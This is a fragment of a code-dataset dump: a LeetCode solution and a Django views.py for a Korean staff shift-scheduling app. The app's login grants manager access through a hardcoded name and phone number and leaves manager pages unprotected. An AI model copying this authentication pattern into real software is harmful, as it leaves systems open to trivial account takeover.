\"SHARED\"]\n","repo_name":"chrishollinworth/vscode-boto3-intellisense","sub_path":"typings/mypy_boto3_appstream/literals.pyi","file_name":"literals.pyi","file_ext":"pyi","file_size_in_byte":6468,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"81"} +{"seq_id":"26124792598","text":"from collections import defaultdict\n# def minimumAbsDifference(arr):\n# # works but inefficient and times out\n# diffs = defaultdict(list)\n# length = len(arr)\n# for i in range(length):\n# for j in range(length):\n# if j > i:\n# a = arr[i]\n# b = arr[j]\n# if a < b:\n# diffs[abs(b-a)].append([a, b])\n# else: \n# diffs[abs(b-a)].append([b, a])\n# minimum = min(list(diffs.keys()))\n# res = sorted(diffs[minimum], key = lambda x: x[0])\n# return res\n\ndef minimumAbsDifference(arr):\n arr.sort()\n # rev = sorted(arr, reverse=True)\n 
minimum = max(arr)\n for x in range(len(arr) - 1):\n a = arr[x]\n b = arr[x + 1]\n diff = abs(b - a)\n if diff < minimum: minimum = diff\n\n # minimum = min([abs(b - a) for b, a in zip(arr,rev)], abs(arr[-2] - arr[-1]), abs(arr[1] - arr[0]))\n i = 0\n j = 1\n pairs = []\n while j < len(arr):\n b = arr[j]\n a = arr[i]\n diff = abs(b - a)\n if diff > minimum:\n i+=1\n elif diff < minimum:\n j+=1\n else:\n pairs.append([a, b])\n j+=1\n if i == j:\n j+=1\n return pairs\n \n\nif __name__ == \"__main__\":\n test = [4,2,1,3] # ==> [[1,2],[2,3],[3,4]]\n # test = [1,3,6,10,15] # ==> [[1,3]]\n # test = [40,11,26,27,-20] # ==> [[26,27]]\n res = minimumAbsDifference(test) \n print(res)","repo_name":"kanuff/leetcode","sub_path":"1200.py","file_name":"1200.py","file_ext":"py","file_size_in_byte":1503,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"71080421386","text":"from audioop import max\nfrom numbers import Real\nfrom operator import is_\n\nfrom django.shortcuts import render,redirect, render_to_response\nfrom .models import *\nfrom .forms import *\nfrom .coremodule import *\n# from django_tables2 import RequestConfig\nfrom django.views.generic import TemplateView, ListView, DetailView, CreateView, UpdateView, DeleteView\nfrom django.urls import reverse\nfrom django.http import HttpResponseRedirect\n\n # ===============================================================\n # ===============================================================\ndef run_schedule_Ndays(n):\n dayList = ['일요일', '금요일', '토요일', '월요일', '화요일', '수요일', '목요일']\n timeList = ['D', 'N', 'N1', 'D1', 'N2', 'D2', 'M', 'M1', 'M2', 'M3', 'M4']\n newList = []\n originList = []\n origin_minFailList=[]\n new_minFailList=[]\n\n qs = Staff.objects.filter(possible_N_days__gte = n).order_by('-score')\n for staff in qs:\n if (staff.newcomer == True):\n newList.append(staff)\n\n else:\n originList.append(staff)\n\n # 기존 스태프 스케쥴링 - N일\n print(\"##### 기존 미소지기 %d 일 스케줄링######\" % (n))\n for staff in originList:\n count = Real_schedule.objects.filter(staff_id=staff).count()\n limit = n\n possible = Possible_schedule.objects.filter(staff_id=staff, day_assigned=False)\n\n for day in dayList:\n day_success = 0 # 그 날에 scheduling이 되었는가\n\n for time in timeList:\n if day_success != 0:\n break\n temp2 = Day.objects.get(day=day, time=time) #### day model\n if temp2.needs - temp2.needs_newcomer <= temp2.real_origin: # 충분한 자리가 있는가?\n continue # 다음 시간대로 넘김, 요일은 그대로라서 continue\n for pos in possible:\n if pos.day_id == temp2:\n # day에 자리가 있으면 추가\n createRealSchedule(pos.id)\n day_success = 1\n count = count + 1\n break\n if count >= limit:\n break\n\n if count < limit :\n origin_minFailList.append(staff)\n\n print(origin_minFailList)\n\n\n # 신규 스태프 스케쥴링 - N일\n print(\"##### 신입 미소지기 %d 일 스케줄링######\" % (n))\n for staff in newList:\n count = Real_schedule.objects.filter(staff_id=staff).count()\n limit = n\n possible = Possible_schedule.objects.filter(staff_id=staff, day_assigned=False)\n\n for day in dayList:\n day_success = 0 # 그 날에 scheduling이 되었는가\n\n for time in timeList:\n if day_success != 0:\n break\n temp2 = Day.objects.get(day=day, time=time) #### day model\n if temp2.needs_newcomer <= temp2.real_newcomer: # 충분한 자리가 있는가?\n continue\n for pos in possible:\n if pos.day_id == temp2:\n createRealSchedule(pos.id)\n day_success = 1\n count = count + 1\n break\n if count >= limit:\n break\n\n if count < limit:\n new_minFailList.append(staff)\n\n\n # 
===============================================================\n # <Phase3>\n # ## Modifier ##\n # 강제 수정\n # ===============================================================\n # minFailList에서 3일 배정\n print(\"##### 기존 미소지기 %d 일 강제 Modify 진행 중.. ######\" % (n))\n print(origin_minFailList)\n\n for staff in origin_minFailList:\n c = modifyFailStaff(staff,n)\n\n print(\"##### 신입 미소지기 %d 일 강제 Modify 진행 중.. ######\" % (n))\n for staff in new_minFailList :\n c = modifyFailStaff(staff,n)\n return True\n\ndef runSchedule():\n originList = []\n newList = []\n dayList = ['일요일', '금요일', '토요일', '월요일', '화요일', '수요일', '목요일']\n timeList = ['D', 'N', 'N1','D1','N2','D2', 'M', 'M1', 'M2', 'M3', 'M4']\n\n origin_minFailList = [] # 기존미소지기 중 최소근무일수 미충족 리스트\n new_minFailList =[] # 신입미소지기 중 최소근무일수 미충족 리스트\n\n\n # ===============================================================\n # <Phase1>\n # 실제 스케줄링 시작 전 Pre-Process\n # 1. 실제 스케줄 데이터 초기화\n # 2. 요일/날짜 마다 실제 배치 인원 초기화\n # 3. 모든 미소지기의 complete Boolean Set : 실제 스케줄 배치가 완료되었는가에 관한 Data 초기화\n # // min_complete : 최소 근무일을 만족시켰는가?\n # ( 모든 미소지기가 최소 3일은 근무 해야 할 때, 3일도 못채웠을 경우 False, 3일 이상 배치되었다면 True )\n # // max_complete : 희망 근무일을 만족시켰는가?\n # ( 미소지기가 제출한 희망 근무일수가 5일 일 때, 5일 배치 되었을 경우 True, 4일 이하 일 경우 False )\n # 4. 가능 스케쥴의 is_assigned / day_assigned 초기화\n # ===============================================================\n\n # 1. 실제 스케줄 데이터 초기화\n Real_schedule.objects.all().delete()\n print(Real_schedule.objects.all())\n\n # 2. 요일/날짜 마다 실제 배치 인원 초기화\n # day의 real_origin과 real_newcomer 초기화\n for day in Day.objects.all():\n day.real_newcomer = 0\n day.real_origin = 0\n day.save()\n\n # 3. 모든 미소지기의 complete Boolean Set : 실제 스케줄 배치가 완료되었는가에 관한 Data 초기화\n # Staff.min_complete , Staff.max_complete 초기화\n \n print(\"##### STAFF 초기화 중 ... ######\")\n for staff in Staff.objects.all():\n staff.min_complete = False\n staff.max_complete = False\n staff.save()\n\n # 4. Possible_schedule의 is_assigned / day_assigned 초기화\n print(\"##### 모든 가능스케줄들 초기화 중 ... ######\")\n for schedule in Possible_schedule.objects.all():\n schedule.is_assigned = False\n schedule.day_assigned = False\n schedule.save()\n\n\n # ===============================================================\n # <Phase2>\n # ## Initializer ##\n # 스케줄링\n # ===============================================================\n\n # Staff 분리, ordering -> 점수 순서대로\n print(\"##### 기존/신입 미소지기 분리 중 ... ######\")\n qs = Staff.objects.all().order_by('-score')\n for staff in qs:\n if(staff.newcomer == True):\n newList.append(staff)\n\n else:\n originList.append(staff)\n print(originList)\n # print(newList)\n\n # 기존 스태프 스케쥴링 - 3일 먼저\n print(\"##### 기존 미소지기 3일 먼저 짜는 중 ... ######\")\n for staff in originList:\n count = 0\n limit = 3\n possible = Possible_schedule.objects.filter(staff_id=staff)\n\n for day in dayList:\n day_success = 0 # 그 날에 scheduling이 되었는가\n\n for time in timeList:\n if day_success != 0:\n break\n temp2 = Day.objects.get(day=day, time=time) #### day model\n if temp2.needs - temp2.needs_newcomer <= temp2.real_origin: # 충분한 자리가 있는가?\n continue # 다음 시간대로 넘김, 요일은 그대로라서 continue\n for pos in possible:\n if pos.day_id == temp2:\n # day에 자리가 있으면 추가\n createRealSchedule(pos.id)\n day_success = 1\n count = count + 1\n\n break\n\n if count >= limit:\n staff.min_complete = True\n staff.save()\n break\n\n if staff.min_complete == False :\n origin_minFailList.append(staff)\n\n print(origin_minFailList)\n\n\n # 신규 스태프 스케쥴링 - 3일 먼저\n print(\"##### 신입 미소지기 3일 먼저 짜는 중 ... 
######\")\n for staff in newList:\n count = 0\n limit = 3\n possible = Possible_schedule.objects.filter(staff_id=staff)\n\n for day in dayList:\n day_success = 0 # 그 날에 scheduling이 되었는가\n\n for time in timeList:\n if day_success != 0:\n break\n temp2 = Day.objects.get(day=day, time=time) #### day model\n if temp2.needs_newcomer <= temp2.real_newcomer: # 충분한 자리가 있는가?\n continue\n for pos in possible:\n if pos.day_id == temp2:\n createRealSchedule(pos.id)\n day_success = 1\n count = count + 1\n\n break\n\n if count >= limit:\n staff.min_complete = True\n staff.save()\n break\n\n if staff.min_complete == False:\n new_minFailList.append(staff)\n\n\n # ===============================================================\n # <Phase3>\n # ## Modifier ##\n # 강제 수정\n # ===============================================================\n # minFailList에서 3일 배정\n print(\"##### 기존 미소지기 3일 배정 강제 Modify 진행 중 ... ######\")\n print(origin_minFailList)\n\n for staff in origin_minFailList:\n c = modifyFailStaff(staff,3)\n\n print(\"##### 신입 미소지기 3일 배정 강제 Modify 진행 중 ... ######\")\n for staff in new_minFailList :\n c = modifyFailStaff(staff,3)\n\n run_schedule_Ndays(4)\n run_schedule_Ndays(5)\n\n return True\n\ndef modifyFailStaff(staff, hope):\n dayList2 = ['토요일', '일요일', '금요일', '월요일', '화요일', '수요일', '목요일']\n timeList2 = ['D', 'N', 'N1', 'D1', 'N2', 'D2', 'M', 'M1', 'M2', 'M3', 'M4']\n timeList2.reverse()\n\n count = Real_schedule.objects.filter(staff_id=staff).count() # 현재까지 배치된 실제스케줄 수\n\n ####### day_assigned = False filtering ########## (fail 미소지기가 가능한 스케줄을 가져올때는 day_assigned 도 체크)\n\n for day in dayList2:\n for time in timeList2:\n bolt = 0\n if count >= hope: # 3일 planning module 이기 때문에 limit = 3\n # 실제 스케줄이 3일 이상이면 함수종료\n return count\n\n # temp2 는 dayList2 와 timeList2를 활용하여 재정렬한 결과임\n # EX) ['토요일':'M1','토요일':'M' ..... 
'목요일':'N', '목요일':'D']\n temp2 = Day.objects.get(day=day, time=time) #### day model\n possible = Possible_schedule.objects.filter(staff_id=staff, is_assigned=False, day_assigned=False)\n for pos in possible:\n if bolt == 1 :\n break\n \n if pos.day_id == temp2:\n # 강제 변경해야 될 시간대에 실제로 배치된 스케줄들을 뽑아옴\n # (이 instance 안에 배치된 미소지기 정보가 있음)\n candidateRealscheudles = Real_schedule.objects.filter(day_id=temp2).reverse()\n\n if staff.newcomer:\n # 실제로 배치된 스케줄들에서 for 문 반복하며 개별 staff를 뽑음\n for candidateReal in candidateRealscheudles:\n\n # candidateStaff 는 실제 스케줄에 배치 된 개별 미소지기\n candidateStaff = candidateReal.staff_id\n if candidateStaff.newcomer :\n # 실패한 미소지기가 강제로 들어가야 될 스케줄에서\n # 후보 미소지기를 다른 시간대로 옮기는 작업 : modifyCandidates()\n if modifyCandidates(candidateStaff, temp2) : # 다른 시간대로 옮기기에 성공했다면\n\n # 다른시간대로 옮겨진 미소지기의 실제 스케줄 삭제\n updateRealSchedule(candidateReal.id,pos.id)\n count += 1\n bolt = 1\n break\n\n else :\n for candidateReal in candidateRealscheudles:\n # candidateStaff 는 실제 스케줄에 배치 된 개별 미소지기\n candidateStaff = candidateReal.staff_id\n if candidateStaff.newcomer == False :\n # 실패한 미소지기가 강제로 들어가야 될 스케줄에서\n # 후보 미소지기를 다른 시간대로 옮기는 작업 : modifyCandidates()\n if modifyCandidates(candidateStaff, temp2) : # 다른 시간대로 옮기기에 성공했다면\n updateRealSchedule(candidateReal.id, pos.id)\n count += 1\n bolt = 1\n break\n return count\n\ndef modifyCandidates(candidateStaff, real_day):\n candidatePossibles = Possible_schedule.objects.filter(staff_id=candidateStaff,\n is_assigned=False, day_assigned=False)\n\n # candidate 는 지금 modify 하려는 날 먼저 possible 있는지 찾고 그뒤에는 day_assigned=False로 재필터링\n candidate_today = Possible_schedule.objects.filter(staff_id=candidateStaff, day_id=real_day,\n is_assigned=False)\n\n # 지금 modify 하려는 real_day 먼저 possible 있는지 찾는 과정\n if candidateStaff.newcomer :\n for today_possible in candidate_today:\n candidateDay = today_possible.day_id\n if candidateDay.needs_newcomer > candidateDay.real_newcomer:\n createRealSchedule(today_possible.id)\n return True\n\n else :\n for today_possible in candidate_today:\n candidateDay = today_possible.day_id\n if candidateDay.needs - candidateDay.needs_newcomer > candidateDay.real_origin:\n createRealSchedule(today_possible.id)\n return True\n\n\n # real_day에 candidatePos 중 가능한날이 없다면 다른 날들 에서는 day_assigned=False 조건 추가 후 진행\n if candidateStaff.newcomer :\n for candidatePos in candidatePossibles:\n candidateDay = candidatePos.day_id\n if candidateDay.needs_newcomer > candidateDay.real_newcomer:\n createRealSchedule(candidatePos.id)\n return True\n\n else :\n for candidatePos in candidatePossibles:\n candidateDay = candidatePos.day_id\n if candidateDay.needs - candidateDay.needs_newcomer > candidateDay.real_origin:\n createRealSchedule(candidatePos.id)\n return True\n\n return False\n\n\n \n\n'''\n# 실행하는 경우 : Real_schedule이 삭제된 경우, Day.needs <= Day.real_origin이 되는 경우\n# Modifiable을 체크하고 결과를 반환한다.\ndef checkModifiableOrigin(da): # Day의 id\n day = Day.objects.get(pk=da)\n # 1. day의 Staff가 부족한 경우 : True\n if day.real_origin > day.needs:\n day.modifiable_origin = True\n day.save()\n return True\n\n # 2. 
day의 Staff가 충분한 경우 :\n # 배정된 Staff중 하나라고 다른 Day에 Schedule을 가질 수 있는 경우 True\n # 아닌 경우 False\n\n # day의 Staff들\n staff = []\n for real in Real_schedule.objects.filter(day_id=da):\n staff.append(real.staff_id)\n\n # 한명의 Staff라도 변경 가능하다면 Modifiable\n for stf in Staff:\n # Staff의 가능 스케쥴의 Day들\n days = Possible_schedule.objects.filter(staff_id=stf, is_assigned=False).day_id\n\n for day2 in days:\n if day2.modifiable_origin:\n day.modifiable_origin = True\n day.save()\n return True\n\n day.modifiable_origin = False\n day.save()\n return False\n'''\n\n\ndef createRealSchedule(possible): # Possible_schedule의 id\n print(\"Real Schedule 생성 ...\")\n\n pos = Possible_schedule.objects.get(pk=possible)\n stf = pos.staff_id\n da = pos.day_id\n print(pos)\n\n # Possible_schedule 동기화\n pos.is_assigned = True\n pos.save()\n\n staffPossibles = Possible_schedule.objects.filter(staff_id=pos.staff_id)\n for possible in staffPossibles:\n if possible.day_id.day == pos.day_id.day:\n possible.day_assigned = True\n possible.save()\n\n # Day 동기화\n if stf.newcomer:\n da.real_newcomer = da.real_newcomer + 1\n else:\n da.real_origin = da.real_origin + 1\n da.save()\n\n # Real_schedule 생성\n rs = Real_schedule(staff_id=stf, day_id=da)\n rs.save()\n return True\n\n\ndef updateRealSchedule(real_id, pos_id): # Real_schedule의 id, Possible_schedule의 id\n real = Real_schedule.objects.get(pk=real_id)\n staff = real.staff_id\n day = real.day_id\n pos = Possible_schedule.objects.get(staff_id=staff, day_id=day)\n new_pos = Possible_schedule.objects.get(pk=pos_id)\n\n # Possible_schedule 동기화\n candidatePossibles = Possible_schedule.objects.filter(staff_id=pos.staff_id)\n failPossibles = Possible_schedule.objects.filter(staff_id=new_pos.staff_id)\n pos.is_assigned = False\n pos.save()\n for possible in candidatePossibles:\n if possible.day_id.day == pos.day_id.day:\n possible.day_assigned = False\n possible.save()\n\n new_pos.is_assigned = True\n new_pos.save()\n for possible in failPossibles:\n if possible.day_id.day == new_pos.day_id.day:\n possible.day_assigned = True\n possible.save()\n\n # 결과적으로 Day 변화 없음\n\n # Real_schedule 수정\n real.staff_id = new_pos.staff_id\n real.save()\n return\n\n'''\ndef createRealSchedule(staff, day): # Staff의 id, Day의 id\n print(\"Real Schedule 생성 ...\")\n stf = Staff.objects.get(pk=staff)\n da = Day.objects.get(pk=day)\n rs = Real_schedule(staff_id=stf, day_id=da)\n rs.save()\n\n return\n'''\n\n'''\ndef runSchedule():\n originList = []\n newList = []\n dayList = ['일요일', '금요일', '토요일', '월요일', '화요일', '수요일', '목요일', '금요일']\n timeList = ['D','N','D1','M','M1']\n dayOrder = []\n\n qs = Staff.objects.all().order_by('-score')\n for staff in qs:\n if(staff.newcomer == True):\n newList.append(staff)\n\n else:\n originList.append(staff)\n\n print(originList)\n print(newList)\n\n dayAll = Day.objects.all()\n for day in dayList:\n for dayInstance in dayAll:\n if dayInstance.day == day:\n pass\n\n print(\"==========\")\n print(dayOrder)\n for staff in originList:\n count = 0\n limit = staff.possible_N_days\n possible = Possible_schedule.objects.filter(staff_id=staff)\n print(possible)\n for day in dayList:\n for dayInstance in dayAll:\n if dayInstance.day == day:\n pass\n\n while(count < limit):\n break\n\n return True\n'''\n\ndef runScheduleView(request):\n if(runSchedule()):\n return redirect('/manager/')\n return render(request, 'plan/planning_running.html')\n\n\nclass PossibleList(TemplateView):\n template_name = 'plan/main.html'\n\n def get_context_data(self,**kwargs):\n qs=Possible_schedule.objects.all\n 
context = super(PossibleList, self).get_context_data(**kwargs)\n context['possibleAll'] = qs\n return context\n\n'''\ndef temppossible(request):\n if request.method == 'POST':\n form = PossibleForm(request.POST)\n\n if form.is_valid():\n possible = form.save(commit=True)\n return redirect('../')\n else:\n form = PossibleForm()\n\n return render(request, 'plan/main.html', {'form':form})\n\n'''\n\n\ndef possibleCreateRetrieveView(request):\n dayList = ['월요일', '화요일', '수요일', '목요일','금요일','토요일','일요일']\n print(request.POST.get('id'))\n if request.method == 'POST':\n staff_name=request.POST.get('name') # 천재용으로 받아옴 웹에서\n query_result = Staff.objects.get(name=staff_name) # 이름으로 staff 를 필터링\n\n print(query_result.id)\n print(type(query_result))\n\n for day in dayList:\n dayTime = request.POST.get(day)\n print(\"==========dayTIme===============\" + dayTime)\n print(type(dayTime))\n if(dayTime == '0'):\n continue\n dayInstance = Day.objects.filter(day=day).get(time=dayTime)\n print(dayInstance)\n\n new_instance = Possible_schedule(staff_id=query_result, day_id=dayInstance)\n new_instance.save()\n\n return redirect('./')\n\n elif request.method =='GET':\n possibleAll = Possible_schedule.objects.all()\n context = {'possibleAll': possibleAll}\n\n return render(request, 'plan/main.html', context)\n\n\ndef loginView(request):\n '''\n Day.objects.all().delete()\n dayList = ['월요일', '화요일', '수요일', '목요일', '금요일', '토요일', '일요일']\n timeList = ['D', 'D1', 'D2', 'M', 'M1', 'M2', 'M3', 'M4', 'N', 'N1', 'N2']\n for day in dayList:\n for time in timeList:\n Day(day=day, time=time).save()\n '''\n #Real_schedule.objects.all().delete()\n context = {}\n if request.method == 'POST':\n post = request.POST\n staffName=post.get('name')\n staffPhone=post.get('phone')\n context['staffName'] = staffName\n context['staffPhone'] = staffPhone\n\n if (staffName == 'manager'):\n if(staffPhone == '01012345678'):\n return redirect('../manager/')\n else:\n context['message'] = \"권한오류 : 매니저 정보를 다시 입력하세요\"\n return render_to_response('plan/loginAlert.html', context)\n\n print(staffName + ':' + staffPhone)\n qs = Staff.objects.filter(name=staffName)\n if qs.count()==0:\n context['message'] = \"경고 : \"+staffName+\" 은 등록 되어 있지 않습니다. 
새로 추가하시겠습니까?\"\n context['mode'] = 2\n newInstance = Staff(name=staffName, phone=staffPhone)\n newInstance.save()\n\n else:\n qs = Staff.objects.filter(phone=staffPhone)\n if (qs.count==0):\n context['message'] = \"경고 : \" + staffName + \"미소지기는 이미 등록 되어 있습니다.\\n\" + staffPhone + \"번호로 추가하시겠습니까?\"\n context['mode'] = 2\n newInstance = Staff(name=staffName, phone=staffPhone)\n newInstance.save()\n\n return redirect('../staff/'+staffName+'/'+staffPhone+'/')\n\n elif request.method == 'GET':\n pass\n\n return render(request, 'plan/login.html')\n\n\ndef managerView(request):\n dayList =['월요일','화요일','수요일','목요일','금요일','토요일','일요일']\n if request.method==\"GET\":\n staffAll = Staff.objects.all().order_by('name')\n realAll = Real_schedule.objects.all().order_by('day_id')\n cellList = []\n\n for staff in staffAll:\n staffDic = {'name': \"\", \"월요일\": [], \"화요일\": [], \"수요일\": [], \"목요일\": [], \"금요일\": [], \"토요일\": [], \"일요일\": [], \"신청일\":\"\",\"근무일\":\"\"}\n staffreals = realAll.filter(staff_id=staff)\n staffDic['name'] = staff.name\n staffDic[\"신청일\"] = staff.possible_N_days\n staffDic[\"근무일\"] = staffreals.count()\n\n for staffReal in staffreals :\n posDay = staffReal.day_id.day # 신청 가능스케줄의 요일\n posTime = staffReal.day_id.time # 신청 가능스케줄의 시간대\n staffDic[posDay].append(posTime)\n\n cellList.append(staffDic)\n\n context = {'staffAll':staffAll,'realAll':realAll, 'dayList':dayList, 'cellList':cellList}\n return render(request, 'plan/manager.html', context)\n\n\ndef staffView(request, staffName, staffPhone):\n dayList = ['월요일','화요일','수요일','목요일','금요일','토요일','일요일']\n print(\"==========\")\n timeList = ['D', 'D1', 'D2', 'M', 'M1', 'M2', 'M3', 'M4', 'N', 'N1', 'N2']\n timeStr = ['D, 6.75h', '06:30 - 13:30, 6.75h', '09:00 - 16:00, 6.75h', '09:30 - 16:30, 6.75h', '13:00 - 20:00, 6.75h', '14:00 - 21:00, 6.75h', '15:00 - 22:00, 6.75h', '16:00 - 23:00, 6.75h', '18:00 - 25:00, 6.75h','20:00 - 27:00, 6.75h', '21:00 - 28:00, 6.75h']\n possibleDays=[]\n bolt=0\n weekendCount = 0\n context = {\"staffName\" : staffName, \"staffPhone\" : staffPhone, \"dayList\" : dayList, \"timeList\": timeList, \"timeStr\":timeStr }\n\n staff = Staff.objects.filter(name=staffName).get(phone=staffPhone)\n print(staff)\n \n if request.method == \"POST\":\n post = request.POST\n print(post)\n for time in timeList: \n postList = post.getlist(time)\n for day in postList:\n for a in possibleDays:\n bolt=0\n if(a==day):\n bolt=1\n break\n if bolt != 1:\n possibleDays.append(day)\n print(\"===============\")\n print(possibleDays)\n for day in possibleDays:\n if day == '토요일' or day == '일요일':\n weekendCount += 1\n\n print(\"주말수 : \" + str(weekendCount))\n if weekendCount == 0 :\n context['message'] = \"최소한 주말 하루는 추가 해주세요!!(토요일, 일요일)\"\n return render_to_response('plan/staffPossibleAlert.html', context)\n\n if len(possibleDays) < int(post.get(\"희망근무일수\")) :\n context['message'] = \"희망근무일수 보다 신청한 근무요일이 적습니다!!\"\n return render_to_response('plan/staffPossibleAlert.html', context)\n \n staff.possible_N_days = post.get(\"희망근무일수\")\n staff.save()\n print(staff.possible_N_days)\n\n # possible schedule 초기화 (모두 삭제)\n Possible_schedule.objects.filter(staff_id=staff).delete()\n\n for time in timeList:\n postList = post.getlist(time)\n print(postList)\n\n for day in postList:\n dayInstance = Day.objects.filter(day=day).get(time=time)\n new_instance = Possible_schedule(staff_id=staff, day_id=dayInstance)\n new_instance.save()\n\n return redirect(\"/staff/\"+staffName+\"/\"+staffPhone+\"/\")\n elif request.method == \"GET\":\n possible = 
Possible_schedule.objects.filter(staff_id=staff)\n\n context[\"day_num\"] = staff.possible_N_days\n context[\"possibleAll\"] = possible\n print(possible)\n return render(request, 'plan/staff_schedule_enrollment.html', context)\n\n\ndef staffRealView(request, staffName, staffPhone):\n dayList = ['월요일', '화요일', '수요일', '목요일', '금요일', '토요일', '일요일']\n context = { 'staffName':staffName, 'staffPhone':staffPhone, 'dayList':dayList }\n staff = Staff.objects.get(name=staffName, phone=staffPhone)\n reals = Real_schedule.objects.filter(staff_id = staff)\n context[\"day_num\"] = reals.count()\n context['realAll'] = reals\n\n return render(request, 'plan/staff_realSchedule.html', context)\n\ndef manageStaffView(request):\n staffAll = Staff.objects.all().order_by('name')\n context = {'staffAll': staffAll, }\n if request.method==\"GET\":\n print(\"getgetget\")\n\n elif request.method == 'POST':\n post = request.POST\n print(\"what is a post : \", end=\"\")\n print(post)\n for staff in staffAll:\n postedList=post.getlist(str(staff))\n print(postedList)\n if len(postedList) != 0 :\n if(postedList[0] != ''): # score 평가점수 수정\n staff.score=postedList[0]\n\n if(len(postedList) == 2) : # newcomer 신입여부 수정\n staff.newcomer = True\n else:\n staff.newcomer = False\n\n staff.save()\n\n return redirect('./')\n\n return render(request, 'plan/manager_staff.html', context)\n\n\ndef manageNeedsView(request):\n if request.method ==\"GET\":\n timeList = ['D', 'D1', 'D2', 'M', 'M1', 'M2', 'M3', 'M4', 'N', 'N1', 'N2']\n dayAll = Day.objects.all()\n context = {'dayAll':dayAll, 'timeList':timeList}\n\n elif request.method == 'POST':\n post = request.POST\n print(post)\n return redirect('./')\n return render(request, 'plan/manager_needs.html',context)\n\n\ndef manageNeedsUpdate(request, day):\n timeList = ['D', 'D1', 'D2', 'M', 'M1', 'M2', 'M3', 'M4', 'N', 'N1', 'N2']\n dayList =['월요일','화요일','수요일','목요일','금요일','토요일','일요일']\n if request.method ==\"GET\":\n dayAll = Day.objects.all()\n context = {'dayAll':dayAll, 'timeList':timeList, 'dayList':dayList, 'currentDay': day}\n\n elif request.method == 'POST':\n post = request.POST\n print(post)\n currentday = day\n for time in timeList:\n forupdate = Day.objects.filter(day=currentday)\n needsList = post.getlist(time)\n forupdate = forupdate.get(time=time)\n\n if needsList[0] == '':\n if needsList[1] == '':\n forupdate.needs_newcomer = 0\n else:\n forupdate.needs_newcomer= needsList[1]\n else:\n forupdate.needs = needsList[0]\n if needsList[1] == '':\n forupdate.needs_newcomer = 0\n else:\n forupdate.needs_newcomer= needsList[1]\n forupdate.save()\n\n return redirect('/manager/hr/')\n\n return render(request, 'plan/manager_needs_update.html',context)\n\n\n# 가능스케줄 페이지 뷰\ndef possibleSchedulesView(request):\n dayList =['월요일','화요일','수요일','목요일','금요일','토요일','일요일']\n if request.method==\"GET\":\n staffAll = Staff.objects.all().order_by('name')\n possibleAll = Possible_schedule.objects.all().order_by('day_id')\n cellList = []\n\n for staff in staffAll:\n staffDic = {'name': \"\", \"월요일\": [], \"화요일\": [], \"수요일\": [], \"목요일\": [], \"금요일\": [], \"토요일\": [], \"일요일\": []}\n staffPossibles = possibleAll.filter(staff_id=staff)\n staffDic['name'] = staff.name\n\n for staffPossible in staffPossibles :\n posDay = staffPossible.day_id.day # 신청 가능스케줄의 요일\n posTime = staffPossible.day_id.time # 신청 가능스케줄의 시간대\n staffDic[posDay].append(posTime)\n\n cellList.append(staffDic)\n\n context = {'staffAll':staffAll,'possibleAll':possibleAll, 'dayList':dayList, 'cellList':cellList}\n return render(request, 
'plan/manager_possibles.html', context)\n\n# 가능스케줄 검색 뷰\ndef possibleSearchView(request):\n dayList =['월요일','화요일','수요일','목요일','금요일','토요일','일요일']\n if request.method==\"GET\":\n staffAll = Staff.objects.all().order_by('name')\n possibleAll = Possible_schedule.objects.all().order_by('day_id')\n\n name = request.GET.get('name', '')\n day = request.GET.get('day', '')\n time = request.GET.get('time', '')\n print(\"====================SearchView====================\")\n print(\"get.name : \", end=\"\")\n print(name)\n print(\"get.day : \", end=\"\")\n print(day)\n print(\"get.time : \", end=\"\")\n print(time)\n\n # 이름으로 검색\n if(name != '') :\n # 스태프\n staffAll = staffAll.filter(name=name)\n q = staffAll\n # 스케줄\n result = []\n for staff in q:\n qs = possibleAll.filter(staff_id=staff)\n\n for possible in qs:\n result.append(possible)\n\n possibleAll = result\n print(possibleAll)\n\n # 요일로 검색\n if(day != '') :\n # 스케줄\n dayList = [day]\n result = []\n if(name !=''):\n for ps in possibleAll:\n if ps.day_id.day == day:\n result.append(ps)\n\n else:\n d = Day.objects.filter(day=day)\n for ds in d:\n q = possibleAll.filter(day_id=ds)\n for qs in q:\n result.append(qs)\n\n possibleAll = result\n\n # 시간으로 검색\n if(time != '') :\n # 스케줄\n result = []\n if (name != '' or day != ''):\n for ps in possibleAll:\n if ps.day_id.time == time:\n result.append(ps)\n\n else:\n t = Day.objects.filter(time=time)\n for ts in t:\n q = possibleAll.filter(day_id=ts)\n for qs in q:\n result.append(qs)\n\n possibleAll = result\n\n # 요일과 시간 검색 : 스태프\n if(day != '' or time !=''):\n posStf = []\n\n for pos in possibleAll:\n if not posStf.__contains__(pos.staff_id):\n posStf.append(pos.staff_id)\n result = []\n for stf in staffAll:\n if posStf.__contains__(stf):\n result.append(stf)\n staffAll = result\n\n context = {'staffAll':staffAll,'possibleAll':possibleAll, 'dayList':dayList}\n\n if(day=='' and time =='' and name==''):\n context = {'dayList': dayList}\n\n return render(request, 'plan/manager_possibles_search.html', context)\n\n\n# 매니저-실제스케줄조회뷰\ndef manageRealView(request):\n dayList = ['월요일', '화요일', '수요일', '목요일', '금요일', '토요일', '일요일']\n timeList = ['D', 'D1', 'D2', 'M', 'M1', 'M2', 'M3', 'M4', 'N', 'N1', 'N2']\n realAll = Real_schedule.objects.all()\n context = {'dayList':dayList, 'timeList':timeList,'realAll':realAll}\n\n return render(request, 'plan/manager_realSchedules.html', context)\n\n\ndef manageRealDayView(request, day):\n dayList = ['월요일', '화요일', '수요일', '목요일', '금요일', '토요일', '일요일']\n timeList = ['D', 'D1', 'D2', 'M', 'M1', 'M2', 'M3', 'M4', 'N', 'N1', 'N2']\n realAll = Real_schedule.objects.all()\n dayAll = Day.objects.all()\n staffAll = Staff.objects.all()\n context = {'day':day,'dayList':dayList, 'timeList':timeList,'realAll':realAll, 'dayAll':dayAll, 'staffAll':staffAll}\n\n return render(request, 'plan/manager_realSchedules_day.html', context)\n\n\n# 페이지 확인을 위한 임시 뷰\ndef indexTest(request):\n return render(request, 'plan/index.html')\n'''\ninstance 뽑아내는 예제\n if request.method==\"GET\":\n staffAll = Staff.objects.all()\n for instance in staffAll:\n staffName = instance.name\n staffPhone = instance.phone\n staffScore = instance.score\n staffPossibleDay = instance.possible_N_days\n context = {'staffAll' : staffAll}\n'''","repo_name":"geniyong/schedule_manager","sub_path":"project/miso/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":36067,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"17583652460","text":"'''A Class for testing 
